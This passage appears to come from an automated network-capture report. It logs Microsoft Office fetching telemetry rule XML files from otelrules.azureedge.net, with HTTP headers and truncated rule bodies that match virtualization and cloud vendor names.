                                                                                                                                       2024-11-29 22:11:23 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       75 | 192.168.2.4 | 49827 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:22 UTC | 192 | OUT | GET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:23 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:22 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 415
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                      x-ms-request-id: 261fcd2e-101e-005a-5345-40882b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221122Z-174f7845968j6t2phC1EWRcfe800000010tg000000000zxs
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:23 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       76 | 192.168.2.4 | 49828 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:24 UTC | 192 | OUT | GET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:24 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 471
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                      x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221124Z-174f78459688l8rvhC1EWRtzr00000000d3000000000e2p8
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:25 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       77 | 192.168.2.4 | 49831 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:24 UTC | 192 | OUT | GET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:24 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                      x-ms-request-id: a521520d-601e-003d-19f6-416f25000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221124Z-174f7845968vqt9xhC1EWRgten00000010g000000000gty7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:25 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.4 | 49829 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:24 UTC | 192 | OUT | GET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:24 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                      x-ms-request-id: abb27c18-501e-008f-0aee-419054000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221124Z-174f7845968n2hr8hC1EWR9cag0000001070000000006kq2
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:25 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.4 | 49830 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:24 UTC | 192 | OUT | GET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:25 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:25 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                      x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221125Z-174f7845968j6t2phC1EWRcfe800000010kg00000000mq46
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:25 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.4 | 49832 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:24 UTC | 192 | OUT | GET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:25 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:25 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                      x-ms-request-id: c5359d4f-401e-0035-67ab-4282d8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221125Z-174f784596886s2bhC1EWR743w00000010pg000000001qea
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:25 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.4 | 49833 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:26 UTC | 192 | OUT | GET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:26 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                      x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221126Z-174f7845968n2hr8hC1EWR9cag000000101g00000000qb6v
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:27 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.4 | 49835 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:26 UTC | 192 | OUT | GET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                      x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968kdththC1EWRzvxn0000000cxg000000007d9w
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:27 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


Session ID | Source IP | Source Port | Destination IP | Destination Port
83 | 192.168.2.4 | 49834 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:27 UTC | 192 | OUT | GET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
2024-11-29 22:11:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                      x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968kvnqxhC1EWRmf3g0000000m9000000000fqg9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:27 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.2.4 | 49836 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:27 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:27 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 485
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                      x-ms-request-id: d02045fe-401e-0064-2d26-4154af000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221127Z-174f7845968qj8jrhC1EWRh41s00000010kg0000000012a9
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
2024-11-29 22:11:27 UTC | 485 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.2.4 | 49837 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:27 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:27 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:27 GMT
Content-Type: text/xml
Content-Length: 411
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B989AF051"
x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221127Z-174f7845968qj8jrhC1EWRh41s00000010eg00000000d4mv
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:27 UTC | 411 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.2.4 | 49838 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:29 UTC | 192 | OUT | GET /rules/rule120662v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:29 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:29 GMT
Content-Type: text/xml
Content-Length: 470
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBB181F65"
x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221129Z-174f78459685m244hC1EWRgp2c000000109000000000h2m9
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:29 UTC | 470 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.2.4 | 49839 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:29 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:29 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:29 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB556A907"
x-ms-request-id: e12d29d9-601e-0001-6315-41faeb000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221129Z-174f7845968vqt9xhC1EWRgten00000010n00000000066ee
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:29 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.2.4 | 49841 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:29 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:29 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:29 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D30478D"
x-ms-request-id: e0c123a1-301e-000c-48a2-42323f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221129Z-174f7845968xlwnmhC1EWR0sv800000010a000000000ee5u
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-11-29 22:11:29 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.2.4 | 49840 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:29 UTC | 192 | OUT | GET /rules/rule120664v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:29 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:29 GMT
Content-Type: text/xml
Content-Length: 502
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6A0D312"
x-ms-request-id: 454be365-001e-0065-3d29-410b73000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221129Z-174f78459684bddphC1EWRbht4000000108000000000crg8
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-29 22:11:29 UTC | 502 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.2.4 | 49842 | 13.107.246.63 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:11:29 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-29 22:11:29 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Nov 2024 22:11:29 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3F48DAE"
x-ms-request-id: b4ece731-701e-0097-3213-42b8c1000000
x-ms-version: 2018-03-28
x-azure-ref: 20241129T221129Z-174f7845968qj8jrhC1EWRh41s00000010hg000000003r6p
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:29 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       91 | 192.168.2.4 | 49844 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:31 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:31 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:31 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 408
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                      ETag: "0x8DC582BB9B6040B"
                                                                                                                                      x-ms-request-id: cf0a4750-201e-005d-5b07-42afb3000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221131Z-174f7845968cpnpfhC1EWR3afc0000001060000000007n80
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:31 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       92 | 192.168.2.4 | 49845 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:31 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:31 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:31 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 469
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                      x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221131Z-174f7845968ljs8phC1EWRe6en00000010g00000000004y7
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                       2024-11-29 22:11:31 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                       93 | 192.168.2.4 | 49846 | 13.107.246.63 | 443
                                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                                       2024-11-29 22:11:31 UTC | 192 | OUT | GET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                       2024-11-29 22:11:31 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:31 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 416
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
